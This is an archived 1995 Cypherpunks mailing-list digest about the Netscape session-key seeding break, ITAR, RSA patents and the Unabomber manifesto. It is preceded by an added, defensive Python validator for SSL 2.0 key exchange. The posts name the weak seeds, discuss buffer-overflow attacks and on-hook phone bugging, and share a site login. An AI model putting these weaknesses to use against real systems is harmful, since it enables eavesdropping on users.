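Returning to Andrew Roos's Commerce Server 1.1 result earlier in this digest: the check his session shows the server was missing, as an added example that is not Roos's, Netscape's or any list member's code. It is a server-side validator for the SSL 2.0 CLIENT-MASTER-KEY message that refuses a MASTER-KEY offered with more clear bytes than the negotiated cipher permits, and then derives the client read and write keys the way SSL 2.0 does. The message layout, CIPHER-KIND codes and MD5 key-material derivation follow the SSL 2.0 draft as I recall it; the RSA private-key operation is a stand-in and every sample value is constructed.

```python
import hashlib
import struct

MSG_CLIENT_MASTER_KEY = 0x02   # SSL 2.0 message type byte
MASTER_KEY_LEN = 16            # MASTER-KEY is 16 bytes for both RC4 ciphers

# CIPHER-KIND codes from the SSL 2.0 draft, mapped to the number of
# MASTER-KEY bytes the spec allows to travel in CLEAR-KEY-DATA.
ALLOWED_CLEAR_BYTES = {
    bytes([0x01, 0x00, 0x80]): 0,    # SSL_CK_RC4_128_WITH_MD5: all 16 secret
    bytes([0x02, 0x00, 0x80]): 11,   # SSL_CK_RC4_128_EXPORT40_WITH_MD5: 11 clear, 5 secret
}


class HandshakeError(Exception):
    """Raised wherever a conforming server should drop the connection."""


def parse_client_master_key(msg: bytes):
    """Split a CLIENT-MASTER-KEY body into (cipher_kind, clear, encrypted, key_arg).

    Layout: type(1) CIPHER-KIND(3) CLEAR-KEY-LENGTH(2) ENCRYPTED-KEY-LENGTH(2)
    KEY-ARG-LENGTH(2) CLEAR-KEY-DATA ENCRYPTED-KEY-DATA KEY-ARG-DATA.
    """
    if len(msg) < 10 or msg[0] != MSG_CLIENT_MASTER_KEY:
        raise HandshakeError("not a CLIENT-MASTER-KEY message")
    cipher_kind = bytes(msg[1:4])
    clear_len, enc_len, arg_len = struct.unpack(">HHH", msg[4:10])
    body = msg[10:]
    if len(body) != clear_len + enc_len + arg_len:
        raise HandshakeError("length fields do not match message size")
    clear = body[:clear_len]
    encrypted = body[clear_len:clear_len + enc_len]
    key_arg = body[clear_len + enc_len:]
    return cipher_kind, clear, encrypted, key_arg


def recover_master_key(msg: bytes, rsa_decrypt):
    """Validate the message, then rebuild the 16-byte MASTER-KEY.

    rsa_decrypt stands in for the server's private-key operation.  The
    clear-key policy is enforced before anything is decrypted or accepted.
    """
    cipher_kind, clear, encrypted, _ = parse_client_master_key(msg)
    allowed = ALLOWED_CLEAR_BYTES.get(cipher_kind)
    if allowed is None:
        raise HandshakeError("unsupported CIPHER-KIND")
    # The check Commerce Server 1.1 evidently lacked: a client that puts more
    # of the key in the clear than the cipher permits has leaked it to any
    # eavesdropper, and the "secure" session that follows is worthless.
    if len(clear) != allowed:
        raise HandshakeError(
            f"{len(clear)} clear key bytes sent, cipher permits {allowed}")
    if not encrypted:
        raise HandshakeError("no ENCRYPTED-KEY-DATA")
    secret = rsa_decrypt(encrypted)
    if len(clear) + len(secret) != MASTER_KEY_LEN:
        raise HandshakeError("MASTER-KEY is not 16 bytes")
    return cipher_kind, clear + secret


def derive_client_keys(master_key: bytes, challenge: bytes, connection_id: bytes):
    """KEY-MATERIAL-0/1 per SSL 2.0: MD5(MASTER-KEY || "0"/"1" || CHALLENGE || CONNECTION-ID).

    Returns (CLIENT-READ-KEY, CLIENT-WRITE-KEY), the two values Roos printed.
    """
    km0 = hashlib.md5(master_key + b"0" + challenge + connection_id).digest()
    km1 = hashlib.md5(master_key + b"1" + challenge + connection_id).digest()
    return km0, km1


def build_client_master_key(cipher_kind: bytes, clear: bytes, encrypted: bytes,
                            key_arg: bytes = b"") -> bytes:
    """Encode a CLIENT-MASTER-KEY body; used here only to construct sample traffic."""
    return (bytes([MSG_CLIENT_MASTER_KEY]) + cipher_kind
            + struct.pack(">HHH", len(clear), len(encrypted), len(key_arg))
            + clear + encrypted + key_arg)
```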
From frogfarm at yakko.cs.wmich.edu Tue Sep 19 19:10:33 1995
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Tue, 19 Sep 95 19:10:33 PDT
Subject: WWW: Unabomber Manifesto
Message-ID: <199509200210.WAA29968@yakko.cs.wmich.edu>

The Unabomber Manifesto as published in the September 19th Washington Post Special Supplement is available in a slightly HTML-ized version at

http://yakko.cs.wmich.edu/~frogfarm/unabomb.html

I welcome all comments on both the form and the content of this page.

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
To be a skeptic is to refuse to be a victim.
"This is my .sig. There are many like it, but this one is mine."
Freedom...yeah, right.

From jcaldwel at iquest.net Tue Sep 19 19:13:01 1995
From: jcaldwel at iquest.net (James Caldwell)
Date: Tue, 19 Sep 95 19:13:01 PDT
Subject: AOL monitoring
Message-ID:

On 19 Sep 95 at 15:45, Thomas Grant Edwards wrote:

> On Sun, 17 Sep 1995, Sal Denaro wrote:
>
> > 2) My .newsrc file can tell anyone that I read alt.hackers and
> > alt.2600
>
> Hmmm...potential new crypto product...a "secure" newsreader with
> encrypted .newsrc?

How hard is it to record downloaded newsgroups/msgs from the news server? Here locally, I just found out that a group of local internet providers use a centrally located NNTP server. Bummer.

From jirib at cs.monash.edu.au Tue Sep 19 19:16:43 1995
From: jirib at cs.monash.edu.au (Jiri Baum)
Date: Tue, 19 Sep 95 19:16:43 PDT
Subject: Scientology and police visit XS4ALL Amsterdam
In-Reply-To:
Message-ID: <199509200214.MAA08618@molly.cs.monash.edu.au>

-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks,

starrd wrote:
> On Wed, 13 Sep 1995, Jiri Baum wrote:
>
> > I feel I should point out that you have no proof that the text you have
> > attributed to me was in fact posted by me, and in fact you have reason
...
> Wasn't a flame my friend.....wasn't meant as one either.

It wasn't taken as one...
I quite agree with your description of the text in question as "drivil" (though I wouldn't have spelled it quite that way). We probably shouldn't judge without context, but I hear the context is of the same intellectual quality anyway.

> > Off topic, but I have been publicly accused so I feel I should publicly
> > respond in the same forum.

I should have been clearer; that "accused" is not of stupidity, but of posting a) allegedly trade secret material b) allegedly copyright material allegedly in excess of fair use. For which you have no proof and in fact have reason to believe otherwise etc.

> -----BEGIN PGP PUBLIC KEY BLOCK-----
...

By the way, starrd, why don't you sign your posts? You obviously have PGP...

Hope this is less ambiguous than my previous post :-)

Jiri
- --
PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMF95CixV6mvvBgf5AQHQmgP/fXrJhmmsnyAVmVyGSnUCOBVSS6sjXSua
F53GFgRS28ICxnQ2d+ooEfbtgsxuzhk1qjphW2MXROAi8QI/GQDWtNeMer0/38yg
ImyXqoysa4mKUgw0v+38QbgXIFeteIY9qyvJbe3O9WGg8gVRnRsWkxIB7QuAPkkC
jVn2ho0gYOw=
=SDDV
-----END PGP SIGNATURE-----

From rsalz at osf.org Tue Sep 19 19:17:04 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 19 Sep 95 19:17:04 PDT
Subject: NYT on Netscape Crack
Message-ID: <9509200216.AA17904@sulphur.osf.org>

>I take a long term view of security. Basically I don't trust security software
>until it has been released in a stable condition for a few years.

Really? So I assume you won't be using an ATM card to buy gasoline until the next millennium?

>Visa and Mastercard will be coming out with a spec which will have very tight
>requirements for implementations.

I thought it was Visa and MC and Microsoft are coming out with an implementation, and then will get around to releasing the specs. One of V or MC also said that the only approved way to do Internet commerce with their card was to use this new system.
/r$

From rsalz at osf.org Tue Sep 19 19:23:09 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 19 Sep 95 19:23:09 PDT
Subject: SFChron
Message-ID: <9509200222.AA17923@sulphur.osf.org>

>"Mike Homer, vice president of marketing for Netscape, said that
>recent breaches do not mean the products are flawed"

Of course, it would have been better if the VP of Marketing said that they had a bug, but that the fundamental architecture is sound.

/r$

From rsalz at osf.org Tue Sep 19 19:38:11 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 19 Sep 95 19:38:11 PDT
Subject: "Hackers"-- brief review and anecdote...
Message-ID: <9509200237.AA17967@sulphur.osf.org>

>> If it wasn't for ITAR the Net would already have secure encryption and
>> authentication, and most such hacker attacks would be impossible (or at
>> least impractical).

>The non-responsive answer is stricken from the record. :-)
>You mean "secure" as Netscape was secure from sameer et al.?

I don't think it's non-responsive, I just think you don't understand your expert witness.

If not for the ITAR then I could distribute my secure applications as a binary library with the security part as source. When you got Netscape you'd read the security code or ask local experts to do so. You'd verify that the code was correct (or at least not stupid). You'd then compile the security code and link it against the main object module and away you'd go. If you didn't have a C compiler, you'd get a binary from someone you trusted.

Of course, all this would be going on in parallel at thousands of sites around the world. Everyone looking at the code, finding holes, reporting them, fixing security bugs, and so on.

But ITAR won't let you do that.

Or netscape would just make calls to the common open multiple-crypto API that existed in a shared library in your machine. But apparently the ITAR won't even let you do this.
/r$

From rsalz at osf.org Tue Sep 19 20:01:34 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 19 Sep 95 20:01:34 PDT
Subject: http://www.osf.org/~rsalz/unabomber
Message-ID: <9509200301.AA18027@sulphur.osf.org>

Snarfed from MIT. I'm sure it will soon be all over on many people's homepages. I don't know if I want this terrorist to appreciate the irony or be disgusted.

/r$

From rsalz at osf.org Tue Sep 19 20:03:39 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 19 Sep 95 20:03:39 PDT
Subject: AOL monitoring
Message-ID: <9509200303.AA18042@sulphur.osf.org>

>How hard is it to record downloaded newsgroups/msgs from the news

INN, probably the most popular NNTP news system, by default logs every time the client does a "group" command, typically sent by the newsreader when you enter a newsgroup. If you only fetch articles by messageid then you'll probably avoid anything other than connection logging.

/r$

From rrothenb at ic.sunysb.edu Tue Sep 19 20:07:07 1995
From: rrothenb at ic.sunysb.edu (Deranged Mutant)
Date: Tue, 19 Sep 95 20:07:07 PDT
Subject: Not Crypto: Referencing Electronic Texts
Message-ID: <199509200306.XAA29101@libws3.ic.sunysb.edu>

This has nothing to do with crypto, but it's a question I'm sure a few people on the list have had to deal with as well...

I'm doing a research project for a class on the problems of making scholarly references to electronic documents, mainly on the how-tos (for the author writing a document as well as one who cites an electronic document in footnotes and bibliographies), as well as some technical problems (sites change or go down, documents are modified by the author or a hacker who doesn't indicate a modification, etc.).

Any information, URLs, references, personal anecdotes, methods, tips, etc. would be greatly appreciated. (Please reply to me and not the list unless you find some bizarre way of relating this to crypto...)
Thanks,
Rob

From sandfort at crl.com Tue Sep 19 20:14:06 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Tue, 19 Sep 95 20:14:06 PDT
Subject: FROM A FRIEND . . .
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Here is a press release that Netscape has issued (is about to issue?) concerning their recent miscue.

S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---------- Forwarded message ----------

*********************************************************************

Potential Vulnerability in Netscape Products - Netscape Responding Immediately To Upgrade Customers and Minimize Risk of Future Threats

Summary:

During regular monitoring of Internet security newsgroups, Netscape has discovered a potential vulnerability in the current version of the Netscape Navigator. Late Sunday evening two UC-Berkeley students posted a message to the Internet detailing their efforts to reverse engineer some security capabilities of the Netscape Navigator. Their efforts revealed how the program generates session encryption keys, enabling them to replicate these keys with a moderate amount of computing power and decipher messages sent across the Internet. The potential vulnerability has since been confirmed by Netscape engineers. With this knowledge an experienced computer programmer could decrypt messages sent by Netscape Navigator to other computers in a few hours of computation time.

Netscape secure software has been in use for almost a year on the Internet by millions of customers and no thefts of actual customer information protected by our security have been reported. This posting on the Internet reported a potential vulnerability, not the actual theft of customer information. Netscape plans to address this vulnerability quickly by providing updated software as soon as possible via the Internet.
An updated version of Netscape Navigator 1.1 and 1.2 will be available for downloading on the Internet next week by existing customers. In addition, Netscape Navigator 2.0, which was announced yesterday and will be available next week in beta versions, includes this improvement as well as a number of additional security features.

Detailed Issue:

Current versions of Netscape Navigator use random information to generate session encryption keys of either 40-bits or 128-bits in length. The random information is found through a variety of functions that look into a user's machine for information about how many processes are running, process ID numbers, the current time in microseconds, etc. The current vulnerability exists because the size of random input is less than the size of the subsequent keys. This means that instead of searching through all the 2^128 possible keys by brute force, a potential intruder only has to search through a significantly smaller key space by brute force. This is a substantially easier problem to solve because it takes much less compute time, and means 40-bit or 128-bit key strength is substantially reduced.

Solution:

Netscape is already implementing a fix to the specific portion of our software where this vulnerability exists. We plan to address the problem by significantly increasing the amount of random information that cannot be discovered by external sources from approximately 30-bits to approximately 300-bits. In addition, the random information will be made much more difficult to replicate because we will greatly expand the techniques and sources used to generate the random information. Once this improvement is made, protection of the random information will be as strong as the rest of the security built into Netscape.

Netscape has also begun to engage an external group of world class security experts who will review our solution to this problem before it is sent to customers.
These experts will validate Netscape's solution and insure that it is complete and effective in solving this vulnerability. The group will be used on an ongoing basis to work with Netscape's internal security experts to review the design and implementation of security in Netscape's products and to provide an additional measure of assurance that these products implement the highest levels of security possible.

This discovery does not affect the strength or security of SSL, RC4, or any other portions of our security implementations. The fix will restore Netscape security across all products to the true 40-bit level for Export and true 128-bit level for U.S. Customers intended before this discovery. Current versions of Netscape Navigator should be replaced with updated versions that will be made available next week.

In addition, the current version of the Netscape Commerce Server has a similar vulnerability during its initial key-pair generation. Therefore, a patch will be made available from Netscape and should be applied by Commerce Server customers to generate a new key pair and server certificate.

Updating Customers:

Netscape will provide the fix for Export (40 bit) versions of Netscape Navigator later this week for downloading by customers on the Internet. Similarly, the Commerce Server patch for Export versions (40 bit) will be made available from our home page. Because downloading of 128 bit versions of the software is still not permitted by U.S. law, U.S. customers of Netscape Navigator, Netscape Navigator Personal Edition and Netscape Commerce Server using 128 bit versions can request the replacement from Netscape for delivery through the regular mail. For additional information or replacements for 128-bit versions of software that you have already purchased, please call the Netscape Replacement Desk at 415-528-3600, email replace at netscape.com, or contact your existing Netscape representative directly.
We will inform you immediately when the updated software is available for download. From mnorton at cavern.uark.edu Tue Sep 19 20:18:00 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Tue, 19 Sep 95 20:18:00 PDT Subject: GAK In-Reply-To: <199509150055.UAA18048@book.hks.net> Message-ID: As I said, phones are inherently tappable--going upstream to the switch must makes it easier to do and harder to detect. This doesn't force the conclusion that, if people speak in code on the phone, they have to give the gov't the key. MacN On Thu, 14 Sep 1995, Lucky Green wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > In article <9509141935.AA09315 at argosy.MasPar.COM>, koontz at MasPar.COM > (David G. Koontz) wrote: > > > >While not every telephone, every telephone switch is required > >to be tap capable - The Digital Telephony Act. Note there is > >provision for the government to pay costs for Telcos to make > >their phones tappable - as yet unfunded by Congress. > > Most telephones can be used to monitor conversations in the room they are > installed in even while on-hook. No need to ever enter the premises. Just > drive it with AC. Look at your basic telephone diagram and remember > Xc=1/(omega*C) from your AC circuits class. > > - -- > - -- Lucky Green > PGP encrypted mail preferred. > - --- > [This message has been signed by an auto-signing service. A valid signature > means only that it has been received at the address corresponding to the > signature and forwarded.] > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > Comment: Gratis auto-signing service > > iQBFAwUBMFjO4yoZzwIn1bdtAQFmjwGAwMA+G0nO0m/lmYeqPJEsC5NJNLvS5cYk > +cMaVSJb+Kwk6+uywu8v088Ih8Nz7uo9 > =elV9 > -----END PGP SIGNATURE----- > From perry at piermont.com Tue Sep 19 20:26:45 1995 From: perry at piermont.com (Perry E. 
Metzger) Date: Tue, 19 Sep 95 20:26:45 PDT Subject: NYT on Netscape Crack In-Reply-To: <43lu3k$7q6@tera.mcom.com> Message-ID: <199509200324.XAA03268@frankenstein.piermont.com> Jeff Weinstein writes: > > I suspect that there are far more flaws in Netscape. String buffer > > overflows are another good guess here -- they are probably rampant > > through the code both for the browser and the commerce server they > > sell. I can't prove it myself, of course, given that I don't have the > > time to rip the thing apart, but the same folks never seemed to learn > > their lesson in release after release when they worked at NCSA, and > > the only thing thats probably keeping their dignity here is the lack > > of distributed source code. > > Sigh. For your information the security code for 1.x versions of > netscape was not even written by someone from NCSA. If there is ANY place in the code that I can do a data driven buffer overflow, I can force you to execute code that I supply. I don't give a damn if it's in the "security" code. It makes no difference where it is. If there is a chink, thats it -- you're meat. Besides, the "security code" obviously was written by someone who doesn't understand anything about cryptography and yet presumed to play cryptographer. A person who thinks seeding things off the time makes for a good PRNG is capable of almost anything. > In the places in the code that I have seen where it looked like such > errors could have crept in, I have found that the correct checks > for buffer overflow have been in place. I have very serious doubts in this regard -- VERY serious doubts, especially given what I've been told by several former Netscape employees. 
Perry From iagoldbe at csclub.uwaterloo.ca Tue Sep 19 20:34:28 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Tue, 19 Sep 95 20:34:28 PDT Subject: Encryption algorithms used in PrivaSoft (fwd) In-Reply-To: <9509191929.AA15153@cs.umass.edu> Message-ID: <43o23b$91r@calum.csclub.uwaterloo.ca> In article <9509191929.AA15153 at cs.umass.edu>, L. McCarthy wrote: >Confirming suspicions that PrivaSoft is a security-through-obscurity outfit: > >> From: David Clavadetscher >> Subject: Re: Encryption algorithms used in PrivaSoft >> >> Dear L., >> >> At this time our crypto engine is patented and proprietary. If you tell me >> the intent of your interest I will see what other information we can provide >> to you. Call me if you like. >[...] Waitasec... I was under the impression that if you patented it, you had to reveal it. That's why RC4 isn't patented (it used to be a trade secret). - Ian "IANAL yadda yadda" From sameer at c2.org Tue Sep 19 20:41:04 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 20:41:04 PDT Subject: response to netscape's press release Message-ID: <199509200336.UAA28871@infinity.c2.org> I plan on releasing a press release regarding the misleading statements made by Netscape in their statement about the seed bug, announcing the web page describing my objections in detail. The document is http://www.c2.org/hacknetscape/critique.phtml detailing my objections to their statements.. I would appreciate comments, corrections, and criticisms. Thanks. (The press release will not be written in the style of the web page. ;-) IN REPLY TO NETSCAPE Netscape announced that they are going to "fix" the problem. In traditional Internet style, I will respond to their post. With this knowledge, an experienced computer programmer could decrypt messages sent by Netscape Navigator to other computers in a few hours of computation time. "a few hours"? Ian and David's program generates keys in 25 seconds. 
The random information is found through a variety of functions that look into a user's machine for information about how many processes are running, process ID numbers, the current time in microseconds, etc. Specifically, the Parent Process ID, the Process ID, and the time in microseconds. See the exploit code for more details. The current vulnerability exists because the size of random input is less than the size of the subsequent keys. The vulnerability exists because the random input isn't random. Since when is the time "random"? I'm sure a few physicists would love to see your theories on that one. (Berkeley Standard Time notwithstanding) Once this improvement is made, protection of the random information will be as strong as the rest of the security built into Netscape Navigator. That's not saying much, considering that the security community has not had a chance to independently verify the security in Netscape Navigator. Netscape has also begun to engage an external group of world-class security experts who will review our solution to this problem before it is sent to customers. So after someone violates Netscape Navigator's security do they decide to have an external group verify their code. (Note that they still don't plan on making it available for the security community at large to review). According to RSADSI's Jim Bidzos, his company offered to review Netscape's security when it was first introduced, but Netscape declined. "They're asking us to review it this time," he said. This discovery does not affect the strength or security of SSL (Secure Sockets Layer), RC4, or any other portions of our security implementations. True, but this implies that SSL is a secure protocol, which has been shown to be false. 
At the beginning of their release: Netscape secure software has been in use for almost a year on the Internet by millions of customers and no thefts of actual customer information protected by our security have been reported - this posting on the Internet reported a potential vulnerability, not the actual theft of customer information. Yes, Netscape is very lucky that Ian and David are students, and not criminals. I sincerely hope that the next time someone finds a hole in Netscape that it's someone who would rather win a free T-shirt than steal lots of money. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From hal9001 at panix.com Tue Sep 19 20:56:36 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Tue, 19 Sep 95 20:56:36 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: At 09:51 9/18/95, Steven Levy wrote: >No chance. The problem for me isn't that someone wanted to call a movie >Hackers but that it causes confusion in that for eleven years there has >been a preexisiting work by that name. There is a novelization of the >screenplay now in paperback, so when if a friend recommends that you buy >Hackers, you'll probably buy that one. (especially since Dell is >determined to do as little as possible for my own book). Normally when there can be confusion between a movie title and an existent book title (in that the movie could be a dramatization of the book based on general subject matter), the movie gets title clearance, pays a token release fee to the book's author, and puts up a title clearance credit in the movie credits. For an example of this, check out Bladerunner (based on "Do Androids Dream of Electronic Sheep?" not "Bladerunner" [which was by a different author]) credits where the prior uses of the title were mentioned. 
From hoz at univel.telescan.com Tue Sep 19 20:59:31 1995
From: hoz at univel.telescan.com (rick hoselton)
Date: Tue, 19 Sep 95 20:59:31 PDT
Subject: PGP back in legal limbo?
Message-ID: <9509200359.AA07322@toad.com>

> WSJ, Sept 19, 1995.
> Cylink Claims Right To Key Technology Involving
> Encryption
> ... The arbitrators
> ruled that RSA hasn't had the right to sublicense the
> Stanford patents since 1990.

>Since PKP (and Bidzos, now president of
>RSA) always said that DH covered all public key encryption,
>it would seem that any RSA licensee would also need a license
>from Cylink.

So, I suppose this invalidates the RSA agreement that allows PGP to be distributed? What "fortunate" timing for the pro GAK folks! Okay, everybody in US, erase your copies, before the Feral government comes to get you.......

Rick F. Hoselton (who doesn't claim to present opinions for others)

From rjc at clark.net Tue Sep 19 21:05:58 1995
From: rjc at clark.net (Ray Cromwell)
Date: Tue, 19 Sep 95 21:05:58 PDT
Subject: NYT on Netscape Crack
In-Reply-To: <199509200324.XAA03268@frankenstein.piermont.com>
Message-ID: <199509200403.AAA14189@clark.net>

> >
> > Sigh. For your information the security code for 1.x versions of
> > netscape was not even written by someone from NCSA.
>
> If there is ANY place in the code that I can do a data driven buffer
> overflow, I can force you to execute code that I supply. I don't give
> a damn if it's in the "security" code. It makes no difference where it
> is. If there is a chink, that's it -- you're meat.

How would you do this if the buffer overflow happened in a buffer which was allocated in a separate protected heap apart from stack and executable data?

-Ray

From adam at homeport.org Tue Sep 19 21:06:32 1995
From: adam at homeport.org (Adam Shostack)
Date: Tue, 19 Sep 95 21:06:32 PDT
Subject: Commercial RSAref
Message-ID: <199509200406.AAA01221@homeport.org>

First off, let me congratulate you on inking this deal. I hope that this will make a lot of interesting things possible, now that there is an RSAref toolkit outside the US, and also for commercial use in the US.

I have a few questions, which I hope you can answer publicly.

Will there be a public, standard fee schedule? Many companies would like to be able to use RSA technology for a fee, and would like to know what that fee is without having to explain their plans in great detail to RSA. I know people who would like to be able to say, here's a check, we're shipping software using RSAref to 5000 desktops.

Will you be adding access points to the software? I know that PGP required new interfaces, previously unpublished, and that use of unpublished interfaces was also a problem RSA had with Wei Dai's excellent Crypto++ library.

Adam

Jonathan Zamick wrote:
| Well I've vacillated between making a formal, dry announcement or
| letting you all know my way. Given the general tenor (and individual
| spirit) of many on Toad it is pretty easy to guess which path I chose.
| So, first of all, here is to a productive future for encryption and
| encryption technologies. Consensus Development and RSA Data Security,
| have finalized the contract for Consensus to license and support
| RSAREF(tm) for commercial use.

| Lastly, we would like to hear suggestions and ideas on how to improve
| RSAREF. We intend to remain responsive to requests, and welcome ideas
| for the evolution of the RSAREF toolkit.

"It is seldom that liberty of any kind is lost all at once."
                                                        -Hume

From scmayo at rschp2.anu.edu.au Tue Sep 19 21:07:29 1995
From: scmayo at rschp2.anu.edu.au (Sherry Mayo)
Date: Tue, 19 Sep 95 21:07:29 PDT
Subject: [NOISE] Unabomber - crypto-anarchist?!?
Message-ID: <9509200407.AA07481@toad.com>

Found this quote from the Electronic Telegraph, the online version of a UK daily newspaper. (world news section, Weds 20th Sept)
http://www.telegraph.co.uk/et/access?ac=116192744309&pg=//95/9/20/wunab20.html

"Editors forced to print manifesto of Unabomber

By Charles Laurence in New York

...The heart of his argument is that industrial society has led to ways of
life for which people are fundamentally unsuited. He calls for a
crypto-anarchic revolution and a new order based on small, village-style
units."
^^^^^^^^^^^^^^^

Uh? Crypto-anarchic? Surely he's not one of ours? ;-) ;-) ;-)

Sherry

ps You are supposed to register to read the ET but I registered as "cypherpunks" passwd "cypherpunks" - don't worry I didn't give the mailing list address.

From bdavis at thepoint.net Tue Sep 19 21:09:15 1995
From: bdavis at thepoint.net (Brian Davis)
Date: Tue, 19 Sep 95 21:09:15 PDT
Subject: "Hackers"-- brief review and anecdote...
In-Reply-To: <9509200237.AA17967@sulphur.osf.org>
Message-ID:

On Tue, 19 Sep 1995, Rich Salz wrote:

> >> If it wasn't for ITAR the Net would already have secure encryption and
> >> authentication, and most such hacker attacks would be impossible (or at
> >> least impractical).
>
> >The non-responsive answer is stricken from the record. :-)
> >You mean "secure" as Netscape was secure from sameer et al.?
>
> I don't think it's non-response, I just think you don't understand
> your expert witness.

Difficult to judge a non-responsive answer to a question, when you delete the question asked ... The question was, essentially, what do you think should happen to a teenage hacker ... The "answer" was ... if you did x hacking wouldn't happen. I guess that means that the domestic version of Netscape can't be broken as sameer did. Oh wait a minute. Yes it can. Sloppy work is sloppy work. And it had nothing to do with imposed limits on key length.

Q. What should you do to a person who robs a liquor store and shoots the storekeeper?
A. If you had gun control, he couldn't have shot him!

Replies in this vein remind me of nothing more than the people who, in response to reports of a tragedy in which children die of starvation, sickness, or whatever, write letters to the editor which say "thousands of children die every year because abortion is legal ..."

And given that the "unexportable" version of Netscape has the same gaping hole as the exportable version, your "it's all ITAR's fault" answer is, indeed, not responsive.

I even included a smiley for the humor-impaired, but that apparently was insufficient.

EBD

From iagoldbe at csclub.uwaterloo.ca Tue Sep 19 21:09:35 1995
From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg)
Date: Tue, 19 Sep 95 21:09:35 PDT
Subject: My Day
Message-ID: <43o44t$hof@calum.csclub.uwaterloo.ca>

Well, my brain's pretty frazzled about now (and I still have a pretty dense paper on xFS to read and summarize for 9am tomorrow for my OS class) from all the press that's gone after me today. The ones I wrote down (I believe sameer wanted a list; I have names and numbers for some of these, too, but it was pretty hectic: get off the phone, go to my terminal, note that I have 20 new mail messages from people wanting interviews or info, and answer the phone because it's ringing again.):

NY Times
WS Journal
SF Chronicle
CNN (camera crew)
Marketplace (NPR)
SF Examiner
Kansas City Star
Chronicle of Higher Education
Boston Globe
Newsweek (or WiReD; it was Steven Levy)

and at least half a dozen more. Not to mention the job offers, one call that I couldn't decipher (it sounded like one of those AI's that you see roaming the net every so often, only on the phone), and email in French (je suis canadien, but I was still amazed I could understand it).

Sorry for the blathering, but that's how I feel just now.

BTW: the line we tended to stress was "public availability of source to at least the security bits", but who knows how it will come out?

Holger.Reif at PrakInf.TU-Ilmenau.DE (Holger Reif) was kind enough to verify that the SunOS 4.1.3 version of Netscape generates its keys in _exactly_ the same way as Solaris and HP-UX; he says he'll test other architectures tomorrow. I suspect any big-endian machine with the lrand48() function (which is used in key generation on Solaris/HP-UX; it's disguised in unssl.c as the macro mklcpr()) will be the same. Other Unix flavours should require only minor changes. I'm still interested in what Windoze clients do (other than lose).

- Ian "So how _did_ Netscape's stock do today?"

From rjc at clark.net Tue Sep 19 21:16:26 1995
From: rjc at clark.net (Ray Cromwell)
Date: Tue, 19 Sep 95 21:16:26 PDT
Subject: WWW: Unabomber Manifesto
In-Reply-To: <199509200210.WAA29968@yakko.cs.wmich.edu>
Message-ID: <199509200416.AAA18328@clark.net>

>
> The Unabomber Manifesto as published in the September 19th
> Washington Post Special Supplement is available in a slightly
> HTML-ized version at
>
> http://yakko.cs.wmich.edu/~frogfarm/unabomb.html

The Unabomber's whole argument about "industrial-technological society must continually remove freedoms" and his arguments about the motives of scientists and technologists, are false by existence of modern cryptography and the cypherpunks. The Unabomber's whole argument rests on his lack of imagination. Almost all his arguments about large scale technology were counterargued years ago on the Extropian's list. The errors in his essay are numerous, for instance, he uses as argument, that medical progress (if that were the only kind of technology) would be bad in and of itself. As an example, he uses diabetes which, if treated, allows the diseased to live longer and pass on their genes. But most forms of diabetes happen at adult onset long after the individual would have reproduced anyway. His arguments against leftists, while partially correct, are poorly constructed and flawed too.

All in all, it wasn't worth the 3 deaths and 17 years of bombings to get tripe like this published. The Unabomber should have found a ghostwriter friend with a degree in philosophy and got him/her to write and publish it. Anyway, the best way to sum up the Unabomber's fantasy world is that people in the past had high self-esteem, they were simple and happy, and didn't have to climb the corporate ladder. Too bad he didn't read any anthropological studies first.

-Ray

From rsalz at osf.org Tue Sep 19 21:25:55 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 19 Sep 95 21:25:55 PDT
Subject: "Hackers"-- brief review and anecdote...
Message-ID: <9509200424.AA18181@sulphur.osf.org>

>The question was, essentially, what do you think should happen to a
>teenage hacker ...

Oops. Sorry for the mistake.
        /r$

From dvw at hamachi.epr.com Tue Sep 19 21:49:26 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Tue, 19 Sep 95 21:49:26 PDT
Subject: Verification of Random Number Generators
Message-ID: <305F9CEC@hamachi>

On Tue, 19 Sep 1995 09:04:29 -0700 "Erik E. Fair" wrote:
--------
>>
>> Just an idle thought: it might be possible to do a probabilistic
>> verification of a RNG by sampling it over some number of samples, and
>> statistically analyzing the sample space. This would be analysis under the
>> model of "RNG as black box" as opposed to (or rather, if you're smart, in
>> addition to) code inspection & review. Any statisticians among us?
>>
>> Erik Fair
>>

The problem with a statistic is that it assumes an independent variable. If the variable is not truly independent (which happens with some frequency in real world analysis), any purported statistical result is meaningless (undefined, to be more precise). Clearly, the hack of netscape relied on the fact that the variable was not independent.

>But statistical tests of randomness alone do not make a good RNG.
>At least, not for cryptographic use. A cryptographically secure
>RNG is also unpredictable, i.e., computationally unfeasible to
>predict the next random bit will be given the algorithm, and not
>reliably reproduced, i.e., multiple runs with the exact same input
>do not generate the same sequence.

This is almost right. Statistical tests work fine if they are conducted on independent variables.

dvw

From tcmay at got.net Tue Sep 19 22:18:12 1995
From: tcmay at got.net (Timothy C. May)
